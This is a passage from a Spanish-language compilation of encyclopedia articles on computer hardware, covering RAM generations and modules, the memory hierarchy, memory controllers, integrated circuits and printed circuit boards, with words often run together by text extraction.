•• PC66: SDR SDRAM, funciona a un máx de 66,6 MHz.•• PC100: SDR SDRAM, funciona a un máx de 100 MHz.•• PC133: SDR SDRAM, funciona a un máx de 133,3 MHz.

RDRAMSe presentan en módulos RIMM de 184 contactos. Fue utilizada en los Pentium IV . Era la memoria más rápida ensu tiempo, pero por su elevado costo fue rápidamente cambiada por la económica DDR. Los tipos disponibles son:•• PC600: RIMM RDRAM, funciona a un máximo de 300 MHz.•• PC700: RIMM RDRAM, funciona a un máximo de 356 MHz.•• PC800: RIMM RDRAM, funciona a un máximo de 400 MHz.•• PC1066: RIMM RDRAM, funciona a un máximo de 533 MHz.

DDR SDRAMMemoria síncrona, envía los datos dos veces por cada ciclo de reloj. De este modo trabaja al doble de velocidad delbus del sistema, sin necesidad de aumentar la frecuencia de reloj. Se presenta en módulos DIMM de 184 contactosen el caso de ordenador de escritorio y en módulos de 144 contactos para los ordenadores portátiles. Los tiposdisponibles son:•• PC1600 o DDR 200: funciona a un máx de 200 MHz.•• PC2100 o DDR 266: funciona a un máx de 266,6 MHz.•• PC2700 o DDR 333: funciona a un máx de 333,3 MHz.•• PC3200 o DDR 400: funciona a un máx de 400 MHz.•• PC4500 o DRR 500: funciona a una máx de 500 MHz

Page 124: Virus informático

Memoria de acceso aleatorio 122

DDR2 SDRAM

Módulos de memoria instalados de 256 MiB cada uno en un sistema con doblecanal.

Las memorias DDR 2 son una mejora de lasmemorias DDR (Double Data Rate), quepermiten que los búferes de entrada/salidatrabajen al doble de la frecuencia del núcleo,permitiendo que durante cada ciclo de reloj serealicen cuatro transferencias. Se presentan enmódulos DIMM de 240 contactos. Los tiposdisponibles son:

•• PC2-4200 o DDR2-533: funciona a un máxde 533,3 MHz.

•• PC2-5300 o DDR2-667: funciona a un máxde 666,6 MHz.

•• PC2-6400 o DDR2-800: funciona a un máxde 800 MHz.

•• PC2-8600 o DDR2-1066: funciona a unmáx de 1066,6 MHz.

•• PC2-9000 o DDR2-1200: funciona a un máx de 1200 MHz

DDR3 SDRAMLas memorias DDR 3 son una mejora de las memorias DDR 2, proporcionan significantes mejoras en el rendimientoen niveles de bajo voltaje, lo que lleva consigo una disminución del gasto global de consumo. Los módulos DIMMDDR 3 tienen 240 pines, el mismo número que DDR 2; sin embargo, los DIMMs son físicamente incompatibles,debido a una ubicación diferente de la muesca. Los tipos disponibles son:•• PC3-6400 o DDR3-800: funciona a un máx de 800 MHz.•• PC3-8500 o DDR3-1066: funciona a un máx de 1066,6 MHz.•• PC3-10600 o DDR3-1333: funciona a un máx de 1333,3 MHz.•• PC3-12800 o DDR3-1600: funciona a un máx de 1600 MHz.•• PC3-14900 o DDR3-1866: funciona a un máx de 1866,6 MHz.•• PC3-17000 o DDR3-2133: funciona a un máx de 2133,3 MHz.•• PC3-19200 o DDR3-2400: funciona a un máx de 2400 MHz.•• PC3-21300 o DD3-2666: funciona a un máx de 2666,6 MHz.

Page 125: Virus informático

Memoria de acceso aleatorio 123

Módulos de la memoria RAM

Formato SO-DIMM.

Los módulos de memoria RAM son tarjetas de circuito impresoque tienen soldados integrados de memoria DRAM por una oambas caras. La implementación DRAM se basa en una topologíade Circuito eléctrico que permite alcanzar densidades altas dememoria por cantidad de transistores, logrando integrados decientos o miles de megabits. Además de DRAM, los módulosposeen un integrado que permiten la identificación de los mismosante el computador por medio del protocolo de comunicaciónSPD.

La conexión con los demás componentes se realiza por medio deun área de pines en uno de los filos del circuito impreso, quepermiten que el modulo al ser instalado en un zócalo apropiado dela placa base, tenga buen contacto eléctrico con los controladoresde memoria y las fuentes de alimentación. Los primeros módulos comerciales de memoria eran SIPP de formatopropietario, es decir no había un estándar entre distintas marcas. Otros módulos propietarios bastante conocidosfueron los RIMM, ideados por la empresa RAMBUS.

La necesidad de hacer intercambiable los módulos y de utilizar integrados de distintos fabricantes condujo alestablecimiento de estándares de la industria como los JEDEC.• Módulos SIMM: Formato usado en computadores antiguos. Tenían un bus de datos de 16 ó 32 bits• Módulos DIMM: Usado en computadores de escritorio. Se caracterizan por tener un bus de datos de 64 bits.• Módulos SO-DIMM: Usado en computadores portátiles. Formato miniaturizado de DIMM.

Relación con el resto del sistema

Diagrama de laarquitectura de un

ordenador.

Dentro de la jerarquía de memoria la RAM se encuentra en un nivel después de losregistros del procesador y de las cachés en cuanto a velocidad. Los módulos de memoria seconectan eléctricamente a un controlador de memoria que gestiona las señales entrantes ysalientes de los integrados DRAM. Las señales son de tres tipos: direccionamiento, datos yseñales de control. En el módulo de memoria esas señales están divididas en dos buses y unconjunto misceláneo de líneas de control y alimentación, Entre todas forman el bus dememoria que conecta la RAM con su controlador:

• Bus de datos: Son las líneas que llevan información entre los integrados y elcontrolador. Por lo general están agrupados en octetos siendo de 8,16,32 y 64 bits,cantidad que debe igualar el ancho del bus de datos del procesador. En el pasado,algunos formatos de modulo, no tenían un ancho de bus igual al del procesador.En esecaso había que montar módulos en pares o en situaciones extremas, de a 4 módulos,para completar lo que se denominaba banco de memoria, de otro modo el sistema no funciona. Esa fue laprincipal razón para aumentar el número de pines en los módulos, igualando al ancho de bus de procesadorescomo el Pentium a 64 bits, a principios de los 90.

• Bus de direcciones: Es un bus en el cual se colocan las direcciones de memoria a las que se requiere acceder. Noes igual al bus de direcciones del resto del sistema, ya que está multiplexado de manera que la dirección se envíaen dos etapas.Para ello el controlador realiza temporizaciones y usa las líneas de control. En cada estándar demódulo se establece un tamaño máximo en bits de este bus, estableciendo un límite teórico de la capacidadmáxima por módulo.

Page 126: Virus informático

Memoria de acceso aleatorio 124

• Señales misceláneas: Entre las que están las de la alimentación (Vdd, Vss) que se encargan de entregar potenciaa los integrados. Están las líneas de comunicación para el integrado de presencia que sirve para identificar cadamódulo. Están las líneas de control entre las que se encuentran las llamadas RAS (row address strobe) y CAS(column address strobe) que controlan el bus de direcciones, por último están las señales de reloj en las memoriassincrónicas SDRAM.

Algunos controladores de memoria en sistemas como PC y servidores se encuentran embebidos en el llamado "NorthBridge" o "Puente Norte" de la placa base. Otros sistemas incluyen el controlador dentro del mismo procesador (enel caso de los procesadores desde AMD Athlon 64 e Intel Core i7 y posteriores). En la mayoría de los casos el tipode memoria que puede manejar el sistema está limitado por los sockets para RAM instalados en la placa base, a pesarque los controladores de memoria en muchos casos son capaces de conectarse con tecnologías de memoria distintas.Una característica especial de algunos controladores de memoria, es el manejo de la tecnología canal doble (DualChannel), donde el controlador maneja bancos de memoria de 128 bits, siendo capaz de entregar los datos de maneraintercalada, optando por uno u otro canal, reduciendo las latencias vistas por el procesador. La mejora en eldesempeño es variable y depende de la configuración y uso del equipo. Esta característica ha promovido lamodificación de los controladores de memoria, resultando en la aparición de nuevos chipsets (la serie 865 y 875 deIntel) o de nuevos zócalos de procesador en los AMD (el 939 con canal doble , reemplazo el 754 de canal sencillo).Los equipos de gama media y alta por lo general se fabrican basados en chipsets o zócalos que soportan doble canalo superior, como en el caso del zócalo (o socket, en inglés) 1366 de Intel, que usaba un triple canal de memoria, o sunuevo LGA 2011 que usa cuádruple canal.

Detección y corrección de erroresExisten dos clases de errores en los sistemas de memoria, las fallas (Hard fails) que son daños en el hardware y loserrores (soft errors) provocados por causas fortuitas. Los primeros son relativamente fáciles de detectar (en algunascondiciones el diagnóstico es equivocado), los segundos al ser resultado de eventos aleatorios, son más difíciles dehallar. En la actualidad la confiabilidad de las memorias RAM frente a los errores, es suficientemente alta como parano realizar verificación sobre los datos almacenados, por lo menos para aplicaciones de oficina y caseras. En los usosmás críticos, se aplican técnicas de corrección y detección de errores basadas en diferentes estrategias:• La técnica del bit de paridad consiste en guardar un bit adicional por cada byte de datos y en la lectura se

comprueba si el número de unos es par (paridad par) o impar (paridad impar), detectándose así el error.• Una técnica mejor es la que usa ECC, que permite detectar errores de 1 a 4 bits y corregir errores que afecten a un

sólo bit. Esta técnica se usa sólo en sistemas que requieren alta fiabilidad.Por lo general los sistemas con cualquier tipo de protección contra errores tiene un costo más alto, y sufren depequeñas penalizaciones en desempeño, con respecto a los sistemas sin protección. Para tener un sistema con ECC oparidad, el chipset y las memorias deben tener soporte para esas tecnologías. La mayoría de placas base no poseendicho soporte.Para los fallos de memoria se pueden utilizar herramientas de software especializadas que realizan pruebas sobre losmódulos de memoria RAM. Entre estos programas uno de los más conocidos es la aplicación Memtest86+ quedetecta fallos de memoria.

Memoria RAM registradaEs un tipo de módulo usado frecuentemente en servidores, posee circuitos integrados que se encargan de repetir las señales de control y direcciones: las señales de reloj son reconstruidas con ayuda del PLL que está ubicado en el módulo mismo. Las señales de datos se conectan de la misma forma que en los módulos no registrados: de manera directa entre los integrados de memoria y el controlador. Los sistemas con memoria registrada permiten conectar más módulos de memoria y de una capacidad más alta, sin que haya perturbaciones en las señales del controlador de

Page 127: Virus informático

Memoria de acceso aleatorio 125

memoria, permitiendo el manejo de grandes cantidades de memoria RAM. Entre las desventajas de los sistemas dememoria registrada están el hecho de que se agrega un ciclo de retardo para cada solicitud de acceso a una posiciónno consecutiva y un precio más alto que los módulos no registrados. La memoria registrada es incompatible con loscontroladores de memoria que no soportan el modo registrado, a pesar de que se pueden instalar físicamente en elzócalo. Se pueden reconocer visualmente porque tienen un integrado mediano, cerca del centro geométrico delcircuito impreso, además de que estos módulos suelen ser algo más altos.[4]

Durante el año 2006 varias marcas lanzaron al mercado sistemas con memoria FB-DIMM que en su momento sepensaron como los sucesores de la memoria registrada, pero se abandonó esa tecnología en 2007 dado que ofrecíapocas ventajas sobre el diseño tradicional de memoria registrada y los nuevos modelos con memoria DDR3.[5]

Referencias[4] http:/ / download. micron. com/ pdf/ datasheets/ modules/ ddr2/ HTJ_S36C512_1Gx72. pdf[5] http:/ / www. theinquirer. net/ inquirer/ news/ 1014319/ fb-dimm-dead-rddr3-king

Jerarquía de memoria

Diagrama de la jerarquía de memoria.

Se conoce como jerarquía dememoria a la organización piramidalde la memoria en niveles que tienen losordenadores. Su objetivo es conseguirel rendimiento de una memoria de granvelocidad al coste de una memoria debaja velocidad, basándose en elprincipio de cercanía de referencias.

Los puntos básicos relacionados con lamemoria pueden resumirse en:•• Cantidad•• Velocidad•• CosteLa cuestión de la cantidad es simple,cuanto más memoria haya disponible,más podrá utilizarse. La velocidadóptima para la memoria es la velocidad a la que el procesador puede trabajar, de modo que no haya tiempos deespera entre cálculo y cálculo, utilizados para traer operandos o guardar resultados. En suma, el coste de la memoriano debe ser excesivo, para que sea factible construir un equipo accesible.Como puede esperarse los tres factores compiten entre sí, por lo que hay que encontrar un equilibrio. Las siguientesafirmaciones son válidas:•• A menor tiempo de acceso mayor coste.•• A mayor capacidad menor coste por bit.•• A mayor capacidad menor velocidad.Se busca entonces contar con capacidad suficiente de memoria, con una velocidad que sirva para satisfacer lademanda de rendimiento y con un coste que no sea excesivo. Gracias a un principio llamado cercanía de referencias,es factible utilizar una mezcla de los distintos tipos y lograr un rendimiento cercano al de la memoria más rápida.Los niveles que componen la jerarquía de memoria habitualmente son:

Page 128: Virus informático

Jerarquía de memoria 126

• Nivel 0: Registros• Nivel 1: Memoria caché• Nivel 2: Memoria principal• Nivel 3: Memorias flash• Nivel 4: Disco duro (con el mecanismo de memoria virtual)• Nivel 5: Cintas magnéticas Consideradas las más lentas, con mayor capacidad.• Nivel 6: Redes (Actualmente se considera un nivel más de la jerarquía de memorias)

Gestión de memoriaLos lenguajes de programación actuales generalmente asumen la existencia de únicamente dos niveles de memoria,memoria principal y almacenamiento secundario (normalmente en disco). Aunque en lenguaje ensamblador,ensamblador en línea y lenguajes como C y C++ podemos direccionar datos directamente a los registros delprocesador. Para aprovechar de forma óptima las ventajas de la jerarquía de memoria es necesario cooperación entreprogramadores, compiladores y fabricantes de hardware:• Programadores deben ser responsables del movimiento entre memoria principal y disco mediante el uso de

ficheros.• Hardware el movimiento de datos entre la memoria principal y los niveles de caché es realizado por algoritmos

hardware.• Compiladores son responsables de optimizar el código de modo que el uso de los registros y la caché sea

eficiente.

Controlador de memoriaEl controlador de memoria es un circuito electrónico digital que se encarga de gestionar el flujo de datos entre elprocesador y la memoria. Puede ser independiente o integrado en otro chip como en el encapsulado del procesador.Tradicionalmente Intel ha colocado el controlador de memoria independiente, localizado en el northbridge de laplaca base, aunque muchos modelos como DEC/Compaq, Alpha 21364, AMD Athlon 64, AMD Opteron, IBMPOWER5, Sun Microsystems UltraSPARC T1, y más recientemente algunos modelos de Intel Nehalem integran elcontrolador de memoria dentro de la misma cámara del procesador; sin embargo la tendencia es integrarlo en elmismo encapsulado del procesador. Todo ello con el objetivo de reducir la latencia y el consumo.Sin embargo este método de integración lastra a renovar los controladores según avanza la tecnología de lasmemorias.Realmente, el concepto de integración no es una idea nueva, varios modelos de procesadores de la década de 1990,como los DEC Alpha 21066 y HP PA-7300LC ya integraban el controlador de memoria dentro de su procesador,aunque no con el propósito de ganancia de rendimiento, sino más bien para ahorrar costes eliminando la necesidadde un chip externo.

Page 129: Virus informático

Controlador de memoria 127

PropósitoLos controladores de memoria contienen los elementos necesarios para leer y escribir en la DRAM y actualizar lamemoria RAM mediante envío de impulsos de corriente a través de todo el dispositivo. Si no se actualizase, laDRAM perdería los datos escritos en los condensadores al dejar escapar la carga en menos de una fracción desegundo. Según las normas de JEDEC, dichas cargas no se escapan con menos de 64 milisegundosLa lectura y escritura en la DRAM se realiza mediante unas direcciones físicas de columnas y filas a través de uncircuito multiplexor, donde posteriormente un demultiplexor se encarga de seleccionar la celda a la que se deseeacceder, al enviar los datos desde la DRAM necesita volver a pasar por el multiplexor con el fin de reducir el anchode bus de la operación.El ancho de bus se define como el número de líneas paralelas dispuestas para poder comunicarse con las celdas.Este ancho se construye de 8 bits hasta de 512 bits, presentes típicamente en ordenadores que requieren una ingentecantidad de transferencia de datos, o más comúnmente en las tarjetas gráficas. En éstas últimas se suelen agrupar envarios chips de 64 bits que trabajan conjuntamente para lograr una suma mayor.

Controladores DDRDDR son las siglas del inglés Double Data Rate, en español podríamos denominarlas Memoria de doble tasa detransferencia de datos. Los controladores de memoria DDR son capaces de manejar memorias del tipo DDRSDRAM, que son capaces de doblar la tasa de datos transferidos a igual frencuencia de reloj y ancho de bus que suspredecesoras.

Circuito integrado

Circuitos integrados de memoria con una ventana de cristal de cuarzo queposibilita su borrado mediante radiación ultravioleta.

Un circuito integrado (CI), tambiénconocido como chip o microchip, es unapastilla pequeña de material semiconductor,de algunos milímetros cuadrados de área,sobre la que se fabrican circuitoselectrónicos generalmente mediantefotolitografía y que está protegida dentro deun encapsulado de plástico o cerámica. Elencapsulado posee conductores metálicosapropiados para hacer conexión entre lapastilla y un circuito impreso.

Page 130: Virus informático

Circuito integrado 128

Introducción

Geoffrey Dummer en los años 1950.

En abril de 1949, el ingeniero alemán Werner Jacobi[] (Siemens AG)completa la primera solicitud de patente para circuitos integrados condispositivos amplificadores de semiconductores. Jacobi realizó unatípica aplicación industrial para su patente, la cual no fue registrada.

Más tarde, la integración de circuitos fue conceptualizada por elcientífico de radares Geoffrey W.A. Dummer (1909-2002), que estabatrabajando para la Royal Radar Establishment del Ministerio deDefensa Británico, a finales de la década de 1940 y principios de ladécada de 1950.

El primer circuito integrado fue desarrollado en 1959 por el ingenieroJack Kilby[] (1923-2005) pocos meses después de haber sidocontratado por la firma Texas Instruments. Se trataba de un dispositivode germanio que integraba seis transistores en una misma basesemiconductora para formar un oscilador de rotación de fase.

En el año 2000 Kilby fue galardonado con el Premio Nobel de Físicapor la enorme contribución de su invento al desarrollo de latecnología.[1]

Al mismo tiempo que Jack Kilby, pero de forma independiente, RobertNoyce desarrolló su propio circuito integrado, que patentó unos seis meses después. Además resolvió algunosproblemas prácticos que poseía el circuito de Kilby, como el de la interconexión de todos los componentes; alsimplificar la esctructura del chip mediante la adición del metal en una capa final y la eliminación de algunas de lasconexiones, el circuito integrado se hizo más adecuado para la producción en masa. Además de ser uno de lospioneros del circuito integrado, Robert Noyce también fue uno de los co-fundadores de Intel, uno de los mayoresfabricantes de circuitos integrados del mundo.[2]

Los circuitos integrados se encuentran en todos los aparatos electrónicos modernos, como relojes de pulsera,automóviles, televisores, reproductores de CD, reproductores de MP3, teléfonos móviles, computadoras, equiposmédicos, etc.El desarrollo de los circuitos integrados fue posible gracias a descubrimientos experimentales que demostraron quelos semiconductores pueden realizar algunas de las funciones de las válvulas de vacío.La integración de grandes cantidades de diminutos transistores en pequeños chips fue un enorme avance sobre elensamblaje manual de los tubos de vacío (válvulas) y en la fabricación de circuitos electrónicos utilizandocomponentes discretos.La capacidad de producción masiva de circuitos integrados, su confiabilidad y la facilidad de agregarlescomplejidad, llevó a su estandarización, reemplazando diseños que utilizaban transistores discretos, y que prontodejaron obsoletas a las válvulas o tubos de vacío.Son tres las ventajas más importantes que tienen los circuitos integrados sobre los circuitos electrónicos construidos con componentes discretos: su menor costo; su mayor eficiencia energética y su reducido tamaño. El bajo costo es debido a que los CI son fabricados siendo impresos como una sola pieza por fotolitografía a partir de una oblea, generalmente de silicio, permitiendo la producción en cadena de grandes cantidades, con una muy baja tasa de defectos. La elevada eficiencia se debe a que, dada la miniaturización de todos sus componentes, el consumo de energía es considerablemente menor, a iguales condiciones de funcionamiento que un homólogo fabricado con componentes discretos. Finalmente, el más notable atributo, es su reducido tamaño en relación a los circuitos discretos; para ilustrar esto: un circuito integrado puede contener desde miles hasta varios millones de transistores en

Page 131: Virus informático

Circuito integrado 129

unos pocos milímetros cuadrados.

Avances en los circuitos integradosLos avances que hicieron posible el circuito integrado han sido, fundamentalmente, los desarrollos en la fabricaciónde dispositivos semiconductores a mediados del siglo XX y los descubrimientos experimentales que mostraron queestos dispositivos podían reemplazar las funciones de las válvulas o tubos de vacío, que se volvieron rápidamenteobsoletos al no poder competir con el pequeño tamaño, el consumo de energía moderado, los tiempos deconmutación mínimos, la confiabilidad, la capacidad de producción en masa y la versatilidad de los CI.[3]

Entre los circuitos integrados más complejos y avanzados se encuentran los microprocesadores, que controlannumerosos aparatos, desde teléfonos móviles y hornos microondas hasta computadoras . Los chips de memoriasdigitales son otra familia de circuitos integrados, de importancia crucial para la moderna sociedad de la información.Mientras que el costo de diseñar y desarrollar un circuito integrado complejo es bastante alto, cuando se reparte entremillones de unidades de producción, el costo individual de los CIs por lo general se reduce al mínimo. La eficienciade los CI es alta debido a que el pequeño tamaño de los chips permite cortas conexiones que posibilitan la utilizaciónde lógica de bajo consumo (como es el caso de CMOS), y con altas velocidades de conmutación.A medida que transcurren los años, los circuitos integrados van evolucionando: se fabrican en tamaños cada vez máspequeños, con mejores características y prestaciones, mejoran su eficiencia y su eficacia, y se permite así que mayorcantidad de elementos sean empaquetados (integrados) en un mismo chip (véase la ley de Moore). Al tiempo que eltamaño se reduce, otras cualidades también mejoran (el costo y el consumo de energía disminuyen, y a la vez queaumenta el rendimiento). Aunque estas ganancias son aparentemente para el usuario final, existe una ferozcompetencia entre los fabricantes para utilizar geometrías cada vez más delgadas. Este proceso, y lo esperado paralos próximos años, está muy bien descrito por la International Technology Roadmap for Semiconductors. [4]

PopularidadSolo ha trascurrido medio siglo desde que se inició su desarrollo y los circuitos integrados se han vuelto casiomnipresentes. Computadoras, teléfonos móviles y otras aplicaciones digitales son ahora partes de las sociedadesmodernas. La informática, las comunicaciones, la manufactura y los sistemas de transporte, incluyendo Internet,todos dependen de la existencia de los circuitos integrados. De hecho, muchos estudiosos piensan que la revolucióndigital causada por los circuitos integrados es uno de los sucesos más significativos de la historia de la humanidad.[5]

TiposExisten al menos tres tipos de circuitos integrados:• Circuitos monolíticos: Están fabricados en un solo monocristal, habitualmente de silicio, pero también existen en

germanio, arseniuro de galio, silicio-germanio, etc.• Circuitos híbridos de capa fina: Son muy similares a los circuitos monolíticos, pero, además, contienen

componentes difíciles de fabricar con tecnología monolítica. Muchos conversores A/D y conversores D/A sefabricaron en tecnología híbrida hasta que los progresos en la tecnología permitieron fabricar resistores precisos.

• Circuitos híbridos de capa gruesa: Se apartan bastante de los circuitos monolíticos. De hecho suelen contenercircuitos monolíticos sin cápsula, transistores, diodos, etc, sobre un sustrato dieléctrico, interconectados con pistasconductoras. Los resistores se depositan por serigrafía y se ajustan haciéndoles cortes con láser. Todo ello seencapsula, en cápsulas plásticas o metálicas, dependiendo de la disipación de energía calórica requerida. Enmuchos casos, la cápsula no está "moldeada", sino que simplemente se cubre el circuito con una resina epoxi paraprotegerlo. En el mercado se encuentran circuitos híbridos para aplicaciones en módulos de radio frecuencia (RF),fuentes de alimentación, circuitos de encendido para automóvil, etc.

Page 132: Virus informático

Circuito integrado 130

ClasificaciónAtendiendo al nivel de integración -número de componentes- los circuitos integrados se pueden clasificar en:• SSI (Small Scale Integration) pequeño nivel: de 10 a 100 transistores• MSI (Medium Scale Integration) medio: 101 a 1.000 transistores• LSI (Large Scale Integration) grande: 1.001 a 10.000 transistores• VLSI (Very Large Scale Integration) muy grande: 10.001 a 100.000 transistores• ULSI (Ultra Large Scale Integration) ultra grande: 100.001 a 1.000.000 transistores• GLSI (Giga Large Scale Integration) giga grande: más de un millón de transistoresEn cuanto a las funciones integradas, los circuitos se clasifican en dos grandes grupos:Circuitos integrados analógicos.

Pueden constar desde simples transistores encapsulados juntos, sin unión entre ellos, hasta circuitos completosy funcionales, como amplificadores, osciladores o incluso receptores de radio completos.

Circuitos integrados digitales.Pueden ser desde básicas puertas lógicas (AND, OR, NOT) hasta los más complicados microprocesadores omicrocontroladores.

Algunos son diseñados y fabricados para cumplir una función específica dentro de un sistema mayor y máscomplejo.En general, la fabricación de los CI es compleja ya que tienen una alta integración de componentes en un espaciomuy reducido, de forma que llegan a ser microscópicos. Sin embargo, permiten grandes simplificaciones conrespecto a los antiguos circuitos, además de un montaje más eficaz y rápido.

Limitaciones de los circuitos integradosExisten ciertos límites físicos y económicos al desarrollo de los circuitos integrados. Básicamente, son barreras quese van alejando al mejorar la tecnología, pero no desaparecen. Las principales son:

Disipación de potenciaLos circuitos eléctricos disipan potencia. Cuando el número de componentes integrados en un volumen dado crece,las exigencias en cuanto a disipación de esta potencia, también crecen, calentando el sustrato y degradando elcomportamiento del dispositivo. Además, en muchos casos es un sistema de realimentación positiva, de modo quecuanto mayor sea la temperatura, más corriente conducen, fenómeno que se suele llamar "embalamiento térmico"y, que si no se evita, llega a destruir el dispositivo. Los amplificadores de audio y los reguladores de tensión sonproclives a este fenómeno, por lo que suelen incorporar protecciones térmicas.Los circuitos de potencia, evidentemente, son los que más energía deben disipar. Para ello su cápsula contiene partesmetálicas, en contacto con la parte inferior del chip, que sirven de conducto térmico para transferir el calor del chipal disipador o al ambiente. La reducción de resistividad térmica de este conducto, así como de las nuevas cápsulas decompuestos de silicona, permiten mayores disipaciones con cápsulas más pequeñas.Los circuitos digitales resuelven el problema reduciendo la tensión de alimentación y utilizando tecnologías de bajoconsumo, como CMOS. Aun así en los circuitos con más densidad de integración y elevadas velocidades, ladisipación es uno de los mayores problemas, llegándose a utilizar experimentalmente ciertos tipos de criostatos.Precisamente la alta resistividad térmica del arseniuro de galio es su talón de Aquiles para realizar circuitos digitalescon él.

Page 133: Virus informático

Circuito integrado 131

Capacidades y autoinducciones parásitasEste efecto se refiere principalmente a las conexiones eléctricas entre el chip, la cápsula y el circuito donde vamontada, limitando su frecuencia de funcionamiento. Con pastillas más pequeñas se reduce la capacidad y laautoinducción de ellas. En los circuitos digitales excitadores de buses, generadores de reloj, etc, es importantemantener la impedancia de las líneas y, todavía más, en los circuitos de radio y de microondas.

Límites en los componentesLos componentes disponibles para integrar tienen ciertas limitaciones, que difieren de sus contrapartidas discretas.• Resistores. Son indeseables por necesitar una gran cantidad de superficie. Por ello sólo se usan valores reducidos

y en tecnologías MOS se eliminan casi totalmente.• Condensadores. Sólo son posibles valores muy reducidos y a costa de mucha superficie. Como ejemplo, en el

amplificador operacional μA741, el condensador de estabilización viene a ocupar un cuarto del chip.• Inductores. Se usan comúnmente en circuitos de radiofrecuencia, siendo híbridos muchas veces. En general no se

integran.

Densidad de integraciónDurante el proceso de fabricación de los circuitos integrados se van acumulando los defectos, de modo que ciertonúmero de componentes del circuito final no funcionan correctamente. Cuando el chip integra un número mayor decomponentes, estos componentes defectuosos disminuyen la proporción de chips funcionales. Es por ello que encircuitos de memorias, por ejemplo, donde existen millones de transistores, se fabrican más de los necesarios, demanera que se puede variar la interconexión final para obtener la organización especificada.

Referencias[2] Historia del circuito integrado en la página oficial de los Premios Nobel (http:/ / www. nobelprize. org/ educational/ physics/

integrated_circuit/ history/ index. html)

Enlaces externos• Documentación sobre Jack Kilby y su descubrimiento en el sitio web de la empresa [[Texas Instruments (http:/ /

www. ti. com/ corp/ docs/ kilbyctr/ jackstclair. shtml)]]• Wikimedia Commons alberga contenido multimedia sobre Circuito integrado. Commons

Page 134: Virus informático

Circuito impreso 132

Circuito impreso

Parte de una tarjeta madre de computador de 1983 Sinclair ZXSpectrum. Se ven las líneas conductoras, los caminos y algunos

componentes montados.

En electrónica, un circuito impreso, tarjeta decircuito impreso o PCB (del inglés printed circuitboard), es una superficie constituida por caminos opistas de material conductor laminadas sobre una baseno conductora. El circuito impreso se utiliza paraconectar eléctricamente - a través de los caminosconductores, y sostener mecánicamente - por medio dela base, un conjunto de componentes electrónicos. Loscaminos son generalmente de cobre mientras que labase se fabrica de resinas de fibra de vidrio reforzada(la más conocida es la FR4), cerámica, plástico, teflóno polímeros como la baquelita.

La producción de los PCB y el montaje de los componentes puede ser automatizada.[1] Esto permite que enambientes de producción en masa, sean más económicos y confiables que otras alternativas de montaje- por ejemploel punto a punto. En otros contextos, como la construcción de prototipos basada en ensamble manual, la escasacapacidad de modificación una vez construidos y el esfuerzo que implica la soldadura de los componentes[2] haceque los PCB no sean una alternativa óptima.

La Organización IPC (Institute for Printed Circuits), ha generado un conjunto de estándares que regulan el diseño,ensamblado y control de calidad de los circuitos impresos, siendo la familia IPC-2220 una de las de mayorreconocimiento en la industria. Otras organizaciones tales como American National Standards Institute (ANSI),International Engineering Consortium (IEC), Electronic Industries Alliance (EIA), Joint Electron DeviceEngineering Council (JEDEC) también contribuyen con estándares relacionados.

HistoriaEl inventor del circuito impreso fue probablemente el ingeniero austriaco Paul Eisler (1907-1995) quien, mientrastrabajaba en Inglaterra, fabricó uno alrededor de 1936, como parte de una radio. [cita requerida] Alrededor de 1943, losEstados Unidos comenzaron a usar esta tecnología en gran escala para fabricar radios que fuesen robustas, para serusadas en la Segunda Guerra Mundial. Después de la guerra, en 1948, EE.UU. liberó la invención para el usocomercial. [cita requerida] Los circuitos impresos no se volvieron populares en la electrónica de consumo hastamediados de 1950, cuando el proceso de Auto-Ensamblaje fue desarrollado por la Armada de los Estados Unidos.[cita requerida]

Antes que los circuitos impresos (y por un tiempo después de su invención), la conexión punto a punto era la másusada. Para prototipos, o producción de pequeñas cantidades, el método 'wire wrap' puede considerarse máseficiente. [cita requerida]

Originalmente, cada componente electrónico tenía pines de cobre o latón de varios milímetros de longitud, y elcircuito impreso tenía orificios taladrados para cada pin del componente. Los pines de los componentes atravesabanlos orificios y eran soldados a las pistas del circuito impreso. Este método de ensamblaje es llamado through-hole ("a través del orificio", por su nombre en inglés). [cita requerida] En 1949, Moe Abramson y Stanilus F. Danko, de laUnited States Army Signal Corps desarrollaron el proceso de autoensamblaje, en donde las pines de los componenteseran insertadas en una lámina de cobre con el patrón de interconexión, y luego eran soldadas. [cita requerida] Con eldesarrollo de la laminación de tarjetas y técnicas de grabados, este concepto evolucionó en el proceso estándar defabricación de circuitos impresos usado en la actualidad. La soldadura se puede hacer automáticamente pasando latarjeta sobre un flujo de soldadura derretida, en una máquina de soldadura por ola. [cita requerida]

Page 135: Virus informático

Circuito impreso 133

El costo asociado con la perforación de los orificios y el largo adicional de las pines se elimina al utilizar dispositivode montaje superficial. Vea Tecnología de montaje superficial más abajo.

Composición físicaLa mayoría de los circuitos impresos están compuestos por entre una a dieciséis capas conductoras, separadas ysoportadas por capas de material aislante (sustrato) laminadas (pegadas) entre sí.Las capas pueden conectarse a través de orificios, llamados vías. Los orificios pueden ser electorecubiertos, o sepueden utilizar pequeños remaches. Los circuitos impresos de alta densidad pueden tener vías ciegas, que sonvisibles en sólo un lado de la tarjeta, o vías enterradas, que no son visibles en el exterior de la tarjeta.

SustratosLos sustratos de los circuitos impresos utilizados en la electrónica de consumo de bajo costo, se hacen de papelimpregnado de resina fenólica, a menudo llamados por su nombre comercial Pértinax. Usan designaciones comoXXXP, XXXPC y FR-2. El material es de bajo costo, fácil de mecanizar y causa menos desgaste de las herramientasque los sustratos de fibra de vidrio reforzados. Las letras "FR" en la designación del material indican "retardante dellama" (Flame Retardant en inglés).Los sustratos para los circuitos impresos utilizados en la electrónica industrial y de consumo de alto costo, estánhechos típicamente de un material designado FR-4. Éstos consisten en un material de fibra de vidrio, impregnadoscon una resina epóxica resistente a las llamas. Pueden ser mecanizados, pero debido al contenido de vidrio abrasivo,requiere de herramientas hechas de carburo de tungsteno en la producción de altos volúmenes. Debido alreforzamiento de la fibra de vidrio, exhibe una resistencia a la flexión alrededor de 5 veces más alta que el Pertinax,aunque a un costo más alto.Los sustratos para los circuitos impresos de circuitos de radio en frecuencia de alta potencia usan plásticos con unaconstante dieléctrica (permitividad) baja, tales como Rogers® 4000, Rogers® Duroid, DuPont Teflón (tipos GT yGX), poliamida, poliestireno y poliestireno entrecruzado. Típicamente tienen propiedades mecánicas más pobres,pero se considera que es un compromiso de ingeniería aceptable, en vista de su desempeño eléctrico superior.Los circuitos impresos utilizados en el vacío o en gravedad cero, como en una nave espacial, al ser incapaces decontar con el enfriamiento por convección, a menudo tienen un núcleo grueso de cobre o aluminio para disipar elcalor de los componentes electrónicos.No todas las tarjetas usan materiales rígidos. Algunas son diseñadas para ser muy o ligeramente flexibles, usandoDuPont's Kapton film de poliamida y otros. Esta 